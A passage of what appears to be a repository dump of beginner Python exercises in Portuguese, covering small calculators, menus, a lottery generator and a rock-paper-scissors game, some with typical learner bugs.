searchKey: # 1列目がTerminalIDと一致するま>で\n gdate=records[i][0]\n gtime=records[i][1]\n gjump=records[i][2]\n gdur =records[i][3]\n gcal =records[i][4]\n gdist=records[i][5]\n print(gdate, gtime, gjump, gdur, gcal, gdist)\n return gdate, gtime, gjump, gdur, gcal, gdist\n\n# 画面のリサイズをバインドする\nroot.bind('<Configure>', change_size)\n\n# メインウィンドウの最大化\nroot.attributes(\"-zoomed\", \"1\")\n\n# 常に最前面に表示\nroot.attributes(\"-topmost\", True)\n\nstart_seq = 0\nstart_text= 'ボタンを押して、ジャンプスタート!'\nstart_time= datetime.now()\nlast_cnt 
= 0\nlast_time = datetime.now()\nlast_dur = 0\nlast_cal = 0\nlast_mv = 0\n\nwhile True:\n\n c.itemconfigure(ch, text=start_text)\n\n # BLE受信処理\n try:\n devices = scanner.scan(interval)\n except Exception as e:\n print(\"ERROR\",e)\n if getpass.getuser() != 'root':\n print('使用方法: sudo', argv[0])\n exit()\n sleep(interval)\n continue\n\n # 受信データについてBLEデバイス毎の処理\n for dev in devices:\n #print(\"\\nDevice %s (%s), RSSI=%d dB\" % (dev.addr, dev.addrType, dev.rssi))\n isRohmMedal = False\n sensors = dict()\n for (adtype, desc, val) in dev.getScanData():\n #print(\" %s = %s\" % (desc, val))\n if desc == 'Short Local Name' and val[0:18] == 'ROHMMedal2_0040_01': #Short Local Name = ROHMMedal2_0040_01.00\n isRohmMedal = True\n if isRohmMedal and desc == 'Manufacturer':\n\n # センサ値を辞書型変数sensorsへ代入\n sensors['ID'] = hex(payval(2,2))\n sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536\n sensors['Humidity'] = 100 * payval(6,2) / 65536\n sensors['SEQ'] = payval(8)\n SEQ = sensors['SEQ']\n \"\"\"if SEQ in [255, 0, 1]:\n start_seq+= 1\n zero_time = datetime.now()\"\"\"\n\n sensors['Condition Flags'] = bin(int(val[16:18],16))\n sensors['Accelerometer X'] = payval(10,2,True) / 4096\n sensors['Accelerometer Y'] = payval(12,2,True) / 4096\n sensors['Accelerometer Z'] = payval(14,2,True) / 4096\n sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\\\n + sensors['Accelerometer Y'] ** 2\\\n + sensors['Accelerometer Z'] ** 2) ** 0.5\n sensors['Geomagnetic X'] = payval(16,2,True) / 10\n sensors['Geomagnetic Y'] = payval(18,2,True) / 10\n sensors['Geomagnetic Z'] = payval(20,2,True) / 10\n sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\\\n + sensors['Geomagnetic Y'] ** 2\\\n + sensors['Geomagnetic Z'] ** 2) ** 0.5\n sensors['Pressure'] = payval(22,3) / 2048\n sensors['Illuminance'] = payval(25,2) / 1.2\n sensors['Magnetic'] = hex(payval(27))\n magnetic = sensors['Magnetic']\n\n sensors['Steps'] = payval(28,2)\n step_cnt = sensors['Steps']\n if SEQ in [255,0,1] and step_cnt == 0:\n start_seq+= 1\n start_time= datetime.now()\n start_text= str(start_seq)+\"回目を\"+start_time.strftime('%H:%M:%S')+\"にスタート。前回は\"+last_time.strftime('%H:%M:%S')+\"に\"+str(last_cnt)\n if last_cnt!=0:\n line_message(start_text)\n sheet.append([last_time.strftime('%Y/%m/%d'), last_time.strftime('%H:%M:%S'), \n last_cnt, last_dur, last_cal, last_mv])\n else:\n last_time= start_time\n last_cnt = step_cnt\n\n cur_time= datetime.now()\n time_text= cur_time.strftime('%Y/%m/%d(%a) %H:%M:%S')\n print(time_text)\n c.itemconfigure(c1, text=time_text)\n\n if start_seq >= 1:\n dur_time= cur_time - start_time\n cur_cnt = round(step_cnt*1.5)\n cur_cal = round(cur_cnt/4)\n cur_mv = round(cur_cnt/1000,1)\n\n #t = '{0:0>2d}:{1:0>2d}:{2:0>2d}'.format(now.hour, now.minute, now.second)\n dur_seconds = dur_time.seconds \n if dur_seconds > 3600:\n dur_text = str(round(dur_seconds / 3600,1)) + \"時間\"\n elif dur_seconds > 60:\n dur_text = str(round(dur_seconds / 60)) + \"分\"\n else:\n dur_text = str(dur_seconds) + \"秒\"\n jump_text= dur_text+\"!\"+str(cur_cnt)+\"回!\"+str(cur_cal)+\"カロリ-!\"\n print(jump_text) #'Count:',cur_cnt,', Duration:',duration,'-',round(duration.seconds))\n\n c.itemconfigure(ch, text=\"{}回目のチャレンジ!目指せ1日1000回!\".format(start_seq))\n c.itemconfigure(c2, text=jump_text)\n if cur_cnt > 10:\n comp_text = str(cur_cnt)+\"回跳んだよ!\"\n if cur_cnt%100 == 0:\n line_message(comp_text)\n elif cur_cnt%10 == 0:\n totals = get_spreadsheet('Total')\n total_jump= totals[2]\n total_dur = totals[3]\n total_hour= round(int(total_dur)/3600,1)\n 
total_cal = totals[4]\n total_food= round(float(total_cal)/200)\n total_mv = totals[5]\n stations = json_load['stations']\n for v in stations:\n dist = v['dist']\n acc_dist = v['acc_dist']\n prev_dist= acc_dist-dist\n if prev_dist < int(total_mv) < acc_dist:\n cur_num = v['num']\n cur_name= v['name']\n cur_dist= dist\n cur_acc_dist= acc_dist\n #next_name = v[cur_num+1]['name']\n mv_text = str(cur_mv)+\"Km進んだよ(\"+cur_name+\"宿まで後\"+str(round(cur_acc_dist-int(total_mv)))+\"Km)\"\n c.itemconfigure(c3, text=mv_text)\n total_text = \"トータル\"+str(total_hour)+\"時間\"+total_jump+\"回跳んで\"+total_cal+\"カロリ-消費!\"\n goal_text = \"おにぎり\"+str(total_food)+\"個分、江戸から\"+total_mv+\"Km!(残り\"+str(round(550-int(total_mv)))+\"Km)\"\n c.itemconfigure(c4, text=total_text)\n c.itemconfigure(c5, text=goal_text)\n\n last_dur = dur_seconds\n last_cal = cur_cal\n last_mv = cur_mv\n\n sensors['Battery Level'] = payval(30)\n sensors['RSSI'] = dev.rssi\n\n # 画面へ表示\n #print(' ID =',sensors['ID'])\n print(' SEQ =',sensors['SEQ'])\n print(' Steps =',sensors['Steps'],'Cnt')\n\n '''\n for key, value in sorted(sensors.items(), key=lambda x:x[0]):\n print(' ',key,'=',value)\n '''\n c.update()\n\n# メインループ\nroot.mainloop()\n\n"
}
] | 8 |
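The per-file statistics stored above (alpha_fraction, alphanum_fraction, avg_line_length, max_line_length, num_lines, length_bytes) are plain text metrics. The following is a hypothetical re-derivation, not the dataset's actual pipeline; under the simplest definitions consistent with the stored numbers it reproduces the values for /jump.sh in the row above — length_bytes 85, num_lines 4, avg_line_length 20, max_line_length 38, alpha_fraction 60/85 ≈ 0.70588, alphanum_fraction 61/85 ≈ 0.71765 (the stored fractions look float32-rounded, so their last digits differ).

```python
def file_metrics(text: str) -> dict:
    """Plausible definitions of the per-file statistics in `files` (assumed, not official)."""
    lines = text.rstrip("\n").splitlines()  # trailing blank lines are not counted
    return {
        "length_bytes": len(text.encode("utf-8")),
        "num_lines": len(lines),
        "avg_line_length": sum(len(ln) for ln in lines) / len(lines),
        "max_line_length": max(len(ln) for ln in lines),
        "alpha_fraction": sum(ch.isalpha() for ch in text) / len(text),
        "alphanum_fraction": sum(ch.isalnum() for ch in text) / len(text),
    }

# The /jump.sh text from the row above.
jump_sh = '#!/bin/bash\necho "Start Jump!"\ncd ~/Programs\nsudo python3 /home/pi/Programs/jump.py\n\n'
print(file_metrics(jump_sh))
# {'length_bytes': 85, 'num_lines': 4, 'avg_line_length': 20.0,
#  'max_line_length': 38, 'alpha_fraction': 0.70588..., 'alphanum_fraction': 0.71764...}
```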
TassioSales/PythonMundo1 | https://github.com/TassioSales/PythonMundo1 | 9660ab8e92070e5b6350400b1ebc51c83c4cae2c | c61eeb28d70a72b9faa47513606edcd718e7161f | bd0abe129e03c941f9ff658e1523d58155017c1d | refs/heads/main | 2023-01-19T18:49:44.807045 | 2021-05-25T04:23:31 | 2021-05-25T04:23:31 | 314,386,026 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5780932903289795,
"alphanum_fraction": 0.5902636647224426,
"avg_line_length": 22.4761905670166,
"blob_id": "7e5913b8c684f944efce2e31dd23503f178938ba",
"content_id": "4a7e9c46ea3871970da6e1d9eee6fc30ea14f29e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 21,
"path": "/EX 081_Extraindo_dados_de_uma_Lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "lista = []\ncont = 0\n\nwhile True:\n num = int(input('Digite um valor: '))\n lista.append(num)\n cont += 1\n opc = str(input('Quer continuar [S/N]? ')).strip().upper()[0]\n if opc == 'S':\n continue\n elif opc == 'N':\n break\n else:\n print('Opção invalida')\nprint(f'Voce digitou {cont} numeros')\nlista.sort(reverse=True)\nprint(f'A Lista ordenada e {lista}')\nif 5 in lista:\n print(\"O numero 5 foi encontrado\")\nelse:\n print('O Numero 5 nao foi encontrado')\n"
},
{
"alpha_fraction": 0.5942028760910034,
"alphanum_fraction": 0.6038647294044495,
"avg_line_length": 28.571428298950195,
"blob_id": "28d7619832b40b52872cbf40048cdfacb320f283",
"content_id": "daa9f97dbf4f9240e819d12ecde391c549dd4df4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 416,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 14,
"path": "/EX 096_Função que calcula área.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "#def area():\n #altura = float(input(\"Digite a altura: \"))\n #largura = float(input(\"Digite a largura: \"))\n #area = altura * largura\n #print(f'A area de uma terreno {altura} x {largura} e de {area}m²')\n#area()\ndef area2(a, l):\n area = a * l\n print(f'A area de um terreno {a} x {l} e de {area}m²')\n\naltura = float(input('ALTURA(m): '))\nlargura = float(input('LARGURA(m) '))\n\narea2(altura, largura)\n"
},
{
"alpha_fraction": 0.48982784152030945,
"alphanum_fraction": 0.5148670077323914,
"avg_line_length": 21.785715103149414,
"blob_id": "f0e49299769f1f5e825c41ab7b0713d86e5e005c",
"content_id": "52f0405fd2953d1669c1bff400cb14c7e877f028",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 639,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 28,
"path": "/EX 088_Palpites para a Mega Sena.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\nlista = []\njogos = []\nprint('-_-' * 8)\nprint('GERADOR JOGOS DA MEGA')\nprint('-_-' * 8)\nqtd = int(input('Quantos jogos voce quer ?'))\ntot = 0\nwhile tot <= qtd:\n cont = 0\n while True:\n num = randint(1, 60)\n if num not in lista:\n lista.append(num)\n cont += 1\n if cont >= 6:\n break\n lista.sort()\n jogos.append(lista[:])\n lista.clear()\n tot += 1\nprint('-x-' * 3, f'SORTEANDO {qtd} JOGOS', '-x-' * 3)\nfor i, l in enumerate(jogos):\n print(f'jogo {i + 1}: {l}')\n sleep(2)\nprint('-x-' * 3, '< BOA SORTE >', '-x-' * 3)\n\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6861538290977478,
"avg_line_length": 31.5,
"blob_id": "4df18107f6f0682a16a0a6d1310dbe98ccdedf6f",
"content_id": "a3377e98809e82831b5a299557fd1447e2de2fd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 10,
"path": "/EX 011_Pintando_parede.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def tinta():\n print(f'Voce vai gasta um total de {area / 2} litros de tinta para pintar a parede: ')\n\n\nlargura = float(input('Digite a Largura : '))\naltura = float(input(\"Digite a Altura :\"))\narea = largura * altura\nprint(f\"A parede de largura {largura} e altura {altura} da uma parede com uma area de {area}m²\")\n\ntinta()\n"
},
{
"alpha_fraction": 0.5541298985481262,
"alphanum_fraction": 0.5741780400276184,
"avg_line_length": 19.09677505493164,
"blob_id": "2c4b9b5bbefa1237e18d80d60fd91bafcbc7077e",
"content_id": "746969cbc730fc39d0713d066e8452dca9bd38b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 62,
"path": "/EX 045_Jokenpo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\ndef Pedra(jogador):\n if jogador == 0:\n print(\"EMPATE\")\n elif jogador == 1:\n print(\"JOGADOR VENCE\") \n elif jogador == 2:\n print(\"COMPUTADOR VENCE\") \n else:\n print(\"JOGADA INVALIDA\")\n\ndef Papel(jogador):\n if jogador == 0:\n print(\"COMPUTADOR VENCE\") \n elif jogador == 1:\n print(\"EMPATE\")\n elif jogador == 2:\n print(\"JOGADOR VENCE\") \n else:\n print(\"JOGADA INVALIDA\")\n\ndef Tesoura(jogador):\n if jogador == 0:\n print(\"JOGADOR VENCE\") \n elif jogador == 1:\n print(\"COMPUTADOR VENCE\") \n elif jogador == 2:\n print(\"EMPATE\")\n else:\n print(\"JOGADA INVALIDA\")\n\nitens = ('Pedra', 'Papel', 'Tesoura')\ncomputador = randint(0, 2)\n\nprint(\"[ 0 ] PEDRA\\n\"\n \"[ 1 ] PAPEL\\n\"\n \"[ 2 ] TESOURA\\n\")\n\njogador = int(input(\"Qual sua jogada ?\"))\nsleep(1)\nprint(\"JO\")\nsleep(1)\nprint(\"KEN\")\nsleep(1)\nprint(\"PO\")\nsleep(1)\n\nprint('-=-' * 12)\nprint(f\"O computador escolheu {itens[computador]}\")\nprint(f\"O jogador escolheu {itens[jogador]}\")\nprint('-=-' * 12)\n\nif computador == 0:\n Pedra(jogador)\n\nelif computador == 1:\n Papel(jogador)\n\nelif computador == 2:\n Tesoura(jogador)\n\n"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.6875,
"avg_line_length": 37.71428680419922,
"blob_id": "56c620353629307973c10643f57e53336a742d18",
"content_id": "958140e3600a7e5216fdb2e9e1ae981060c8df4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 7,
"path": "/EX 031_Custo_da_viagem .py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "distancia = float(input(\"Digite a distancia da viagem : \"))\nprint(f\"Voce esta prestes a começar uma viagem de {distancia}km\")\nif distancia <= 200.0:\n preco = distancia * 0.50\nelse:\n preco = distancia * 0.45\nprint(f'E o preço da sua passagem será de R${preco:.2f}') "
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6403743028640747,
"avg_line_length": 30.08333396911621,
"blob_id": "21739eb1381ac628e520c38fd0957c2cf66a8209",
"content_id": "391822f8841fc26e1cd2de8be9c09a042b3fe3bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 24,
"path": "/EX 056_Analisador_completo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "somaidade = 0\nmediaidade = 0\nmaioridadedehomem = 0\nnomedovelho = 0 \ntotmulher20 = 0\nfor c in range (0,4):\n nome = str(input(\"Nome: \")).strip()\n idade= int(input('Digite sua idade: '))\n sexo = str(input(\"Sexo[M/F]: \")).strip()\n somaidade += idade\n if p == 1 and sexo in \"Mm\":\n maioridadedehomem = idade \n nomevelho = nome\n if sexo in 'Mm' and idade > maioridadedehomem:\n maioridadedehomem = idade \n nomevelho = nome\n if sexo in \"Ff\" and idade < 20:\n totmulher20 += 1\n\n\nmediaidade = somaidade / 4\nprint(f'A media de idade e {mediaidade} anos ')\nprint(f'O homem mais velho tem {maioridadedehomem} anos e se chama {nomevelho}')\nprint(f'Ao todo são {totmulher20} mulheres com menos de 20 anos')\n\n\n"
},
{
"alpha_fraction": 0.6589403748512268,
"alphanum_fraction": 0.6754966974258423,
"avg_line_length": 22.230770111083984,
"blob_id": "8b0e808b642c8310d0eaaa4c80d708ec316da74c",
"content_id": "a21ede1f7e92631b925851c68f29dbc40b2b7ef5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 13,
"path": "/EX 074 _Maior_e_menor_valores _em _Tupla.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nvalores = [randint(1, 60) for i in range(0, 6)]\n\nprint(f'Os valores sorteado foram', end=\" \")\n\nvalores = sorted(valores)\n\nfor n in valores:\n print(f'{n}', end=\" \")\n\nprint(f\"\\nO Maior valor sorteado foi {max(valores)}\")\nprint(f'O menor valor sorteado foi {min(valores)}')\n"
},
{
"alpha_fraction": 0.530324399471283,
"alphanum_fraction": 0.5615891218185425,
"avg_line_length": 28.54166603088379,
"blob_id": "89120478202da73bbb96831a2b9d0e566f1d7f03",
"content_id": "607ebb6186d2c055323f76372e6c0a267b1676fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4268,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 144,
"path": "/EX 012_Calculando_desconto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "roupa = []\nvalor = []\nvalorTotal = sum(valor)\n\n\ndef adicionar():\n roupa.append(input('Digite qual tipo de roupa : '))\n valor.append(float(input(\"Digite o valor : \")))\n\n\ndef excluir():\n global c\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n opc = int(input(\"Qual vc deseja expluir ?\"))\n while c != opc:\n print(\"opcão invalida\")\n opc = int(input(\"Qual vc deseja expluir ?\"))\n print(f\"Voce escolheu a {opc} que e uma {roupa[c]}\")\n decisao = str(input('Tem ceteza disso S/N : ')).upper().strip()\n if decisao == \"S\":\n del (roupa[opc])\n del (valor[opc])\n elif decisao == \"N\":\n print(\"Ok Voltando para o menu\")\n else:\n print(\"opção invalida\")\n print(\"Retornando ao MENU\")\n\n\ndef modificar():\n global c\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n mod = int(input('Qual opçao vc deseja modificar:'))\n print(c)\n print(mod)\n while mod != c:\n print(\"opcão invalida\")\n mod = int(input(\"Qual vc deseja modificar ?\"))\n print(f\"Voce escolheu a {mod} que e uma {roupa[c]}\")\n decisao = str(input('Tem ceteza disso S/N : ')).upper().strip()\n if decisao == \"S\":\n roupa[mod] = input(\"Digite qual tipo de roupa: \")\n valor[mod] = float(input(\"Digite o valor para modigficado :\"))\n elif decisao == \"N\":\n print(\"Ok Voltando para o menu\")\n else:\n print(\"opção invalida\")\n print(\"Retornando ao MENU\")\n\n\ndef desconto():\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n print(f'O valor total dos produtos deu: R${sum(valor)}')\n desc = float(input('Quantos % voce quer da de desconto'))\n totalComDesconto = sum(valor) - (sum(valor) * desc / 100)\n print(f'O total a ser pago e R$ {totalComDesconto}')\n\n\ndef mostra():\n for c in range(0, len(roupa)):\n print(f'COD : \\033[31m{c}\\033[m TIPO \\033[36m{roupa[c]}\\033[m VALOR R$ \\033[35m{valor[c]}\\033[m\\n')\n\n\ndef menuformaspagemento():\n print('FORMAS DE PAGAMENTO')\n print('( 1 ) Dinheiro:\\n'\n '( 2 ) Cartao Debito:\\n'\n '( 3 ) Credito:\\n'\n '( 4 ) Cheque: \\n'\n '( 5 ) Tranferecia Bancaria: \\n'\n '( 6 ) Outro tipo de desconto\\n'\n '( 8 ) Cancelar compra\\n')\n\n\ndef menuprincipal():\n print('MENU\\n'\n '(1)ADICIONAR\\n'\n '(2)EXCLUIR\\n'\n '(3)MODIFICAR\\n'\n '(4)DESCONTO\\n'\n '(5)MOSTRA ITENS\\n'\n '(6)FINALIZAR COMPRA\\n')\n\n\ndef menubancos():\n print('INFORME AO CLIENTE OS BANCOS')\n print('( 1 ) BANCO BRASIL\\n'\n '( 2 ) CAIXA ECONOMIDA\\n'\n '( 3 ) ITAU\\n')\n\n\ndef finalizarcompra():\n menuformaspagemento()\n opc = int(input('Digite a opção desejada: '))\n\n def dinheiro():\n valortotal = sum(valor)\n print(valortotal)\n tot_desc = 15\n print(f'Sua compra deu um valor de R${valortotal}')\n valortotal = valortotal - (valortotal * tot_desc / 100)\n print(f'Com desconto de preço avista de 15% a compra ficara por {valortotal}')\n valorPago = float(input('Qual valor recebido para pagamento '))\n troco = valorPago - valortotal\n if valorPago > valortotal:\n print(f'Devolva para o cliente de troco o valor de R$ {troco}')\n print(\"Obrigado pela preferecia volte sempre:\")\n valor.clear()\n roupa.clear()\n elif valorPago == valorTotal:\n print(\"Obrigado pela preferecia volte sempre:\")\n valor.clear()\n roupa.clear()\n while valorPago < valortotal:\n continue\n\n\n\n if opc == 1:\n 
dinheiro()\n\n\nwhile True:\n menuprincipal()\n opcao = int(input('Qual opção desejada: '))\n\n if opcao == 1:\n adicionar()\n elif opcao == 2:\n excluir()\n elif opcao == 3:\n modificar()\n elif opcao == 4:\n desconto()\n elif opcao == 5:\n mostra()\n elif opcao == 6:\n finalizarcompra()\n else:\n print(\"OPÇÃO INVALIDA\")\n continue\n"
},
{
"alpha_fraction": 0.5793991684913635,
"alphanum_fraction": 0.6137338876724243,
"avg_line_length": 25,
"blob_id": "b14245501282c52e7d7c0a1697bedff019a01047",
"content_id": "86306ef33e753ffa279240fe8da8a74b5ce7de11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 9,
"path": "/EX 066 _Vários_números_com_flag.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma=cont= 0\nwhile True:\n num =int(input(\"digite um numero (999 para parar): \"))\n if num == 999:\n break\n cont += 1\n soma += num\nprint(f\"Voce digitou {cont} numeros\")\nprint(f'A soma dos valores digitados e {soma}')"
},
{
"alpha_fraction": 0.5135565996170044,
"alphanum_fraction": 0.5534290075302124,
"avg_line_length": 24.100000381469727,
"blob_id": "247f71e20d97a35ada35423c35233d644aec52e3",
"content_id": "e2f63b6c20696d3738f2ac52b7765dfc2806d3a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1262,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 50,
"path": "/EX 059_Criando_um_Menu_de_Opções.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def somar (n1, n2):\n soma = n1 + n2\n print(f\"A soma dos numeros {n1} e {n2} = {soma}\")\n\ndef subtracao(n1, n2):\n subtracao = n1 - n2\n print(f\"A subtracao dos numeros {n1} e {n2} = {subtracao}\")\n\ndef multiplicacao(n1, n2):\n multiplicacao = n1 * n2 \n print(f\"A multiplicação dos numeros {n1} e {n2} = {multiplicacao}\")\n\n \ndef maior(n1, n2):\n maior = n1\n if n2 > n1:\n maior = n2\n print(f\"O maior numero digitado foi {maior}\")\nnum1 = float(input(\"Digite o primeiro valor: \"))\nnum2 = float(input(\"Digite o segundo valor : \"))\nwhile True:\n print(\"\"\"\n [ 1 ] somar\n [ 2 ] subtrair\n [ 3 ] multiplicação\n [ 4 ] Novos numeros\n [ 5 ] Maior\n [ 6 ] Sair\n\"\"\")\n opt = int(input(\"Digite sua opção: \"))\n if opt == 1:\n somar(num1, num2)\n elif opt == 2:\n subtracao(num1, num2)\n elif opt == 3:\n multiplicacao(num1, num2) \n elif opt == 4:\n num1 = float(input(\"Digite o primeiro numero: \"))\n num2 = float(input(\"Digite o segundo numero: \"))\n print(f\"Os novos numeros digitatos foram {num1} e {num2}\")\n continue\n elif opt == 5:\n maior(num1, num2)\n elif opt == 6:\n break\n else:\n print(\"Opção invalida\")\n continue\n\n()"
},
{
"alpha_fraction": 0.6472868323326111,
"alphanum_fraction": 0.6705426573753357,
"avg_line_length": 27.77777862548828,
"blob_id": "67fbc0b0596863af58cadfb3f0e270179dd8542c",
"content_id": "ceae953b0e7a5e5a7eb94c1ed7d6a2ffb7c87642",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 259,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/EX 038_Comparando_Numeros.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num1 = float(input(\"Digite o primeiro numero: \"))\nnum2 = float(input(\"Digite o segundo numero: \"))\n\nif num1 > num2:\n print(\"O PRIMEIRO numero e maior\")\nelif num2 > num1:\n print(\"O SEGUNDO numero e maior\")\nelse:\n print(\"OS dois numeros são IGUAIS\")"
},
{
"alpha_fraction": 0.6176470518112183,
"alphanum_fraction": 0.633217990398407,
"avg_line_length": 25.31818199157715,
"blob_id": "35961ed32114600133e2d4f9e6bd47e5e6dcf914",
"content_id": "13885e5bf52fb626887c0edc3d0a6d57411e3d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 22,
"path": "/EX 037_Conversor_de_Bases_Numéricas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def binario(x):\n print(f\"O numero {x} convertido para binario e {bin(x)[2:]}\")\n\ndef octal(x):\n print(f'O numero {x} convertido para OCTAL e {oct(x)[2:]}')\n\ndef hexadecimal(x):\n print(f'O numero {x} convertido para HEXADECIMAL e {hex(x)[2:]}')\n\nnum = int(input('Digite um numero: '))\nprint('[ 1 ] converter para BINARIO')\nprint('[ 2 ] converter para OCTAL')\nprint('[ 3 ] converter para HEXADECIMAL')\nopc = int(input('Digite sua opção: '))\nif opc == 1:\n binario(num)\nelif opc == 2:\n octal(num)\nelif opc == 3:\n hexadecimal(num)\nelse:\n print(\"OPÇÃO INVALIDA\")"
},
{
"alpha_fraction": 0.6984127163887024,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 41.33333206176758,
"blob_id": "e53e18b84228848bd9916acf47d6fdbc81ae6b67",
"content_id": "d667b272d2b80f2c1e1417968a851d15c5121d12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 3,
"path": "/EX 014_Conversor_de_Temperaturas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "import math\nnum = float(input('digite um numero: '))\nprint(f'o numero real e {num} e sua porcao inteira e {math.trunc(num)} ')"
},
{
"alpha_fraction": 0.5479274392127991,
"alphanum_fraction": 0.5854922533035278,
"avg_line_length": 27.592592239379883,
"blob_id": "68d42cd69b943472fef4ef9fdf3d3d26ce4e0a9f",
"content_id": "a49a6383523e2011d5e20946d390eae036482206",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 27,
"path": "/exercicio_guanabara_2.0/EX 003.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num1 = float(input('Digite uma numero: '))\nnum2 = float(input('Digite outro numero: '))\n\n\ndef soma(x, y): return x + y\ndef subtracao(x, y): return x - y\ndef divisao(x, y): return x / y\ndef multiplicacao(x, y): return x * y\n\n\nprint(f'''{'MENU':^20}\n [ 1 ] SOMA\n [ 2 ] SUBTRAÇÃO \n [ 3 ] DIVISAO\n [ 4 ] MULTIPLICAÇÃO\n [ 5 ] SAIR ''')\nopc = int(input('digite a opção desejada: '))\nif opc == 1:\n print(f'A soma de {num1} e {num2} = {soma(num1, num2)}')\nelif opc == 2:\n print(f'A subtração de {num1} e {num2} = {subtracao(num1, num2)}')\nelif opc == 3:\n print(f'A divisao de {num1} e {num2} = {divisao(num1, num2)}')\nelif opc == 4:\n print(f'A multiplicação de {num1} e {num2} = {multiplicacao(num1, num2)}')\nelse:\n print('opção invalida')\n"
},
{
"alpha_fraction": 0.5841924548149109,
"alphanum_fraction": 0.6254295706748962,
"avg_line_length": 35.25,
"blob_id": "7487d9503a4cfb57e5fd9cb0866bf65bba6140f1",
"content_id": "3960ee2315dfc8c586b9bc0060ad7ae6455f3958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 8,
"path": "/EX 032_Ano_Bissexto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date \nano = int(input(\"Digite que ano deseja analisar: ou digite 0 para o ano atual \"))\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n print(f'O ano {ano} e BISSEXTO')\nelif ano == 0:\n ano = date.today().year\nelse:\n print(f'O ano {ano} NÃO e BISSEXTO')\n\n"
},
{
"alpha_fraction": 0.6340042352676392,
"alphanum_fraction": 0.6583686470985413,
"avg_line_length": 40.0217399597168,
"blob_id": "9b9d3c66ef9e367c2c8aa964921724bfde1ac41a",
"content_id": "b6f91f663149440483afab2155cf65c5321a1a82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1898,
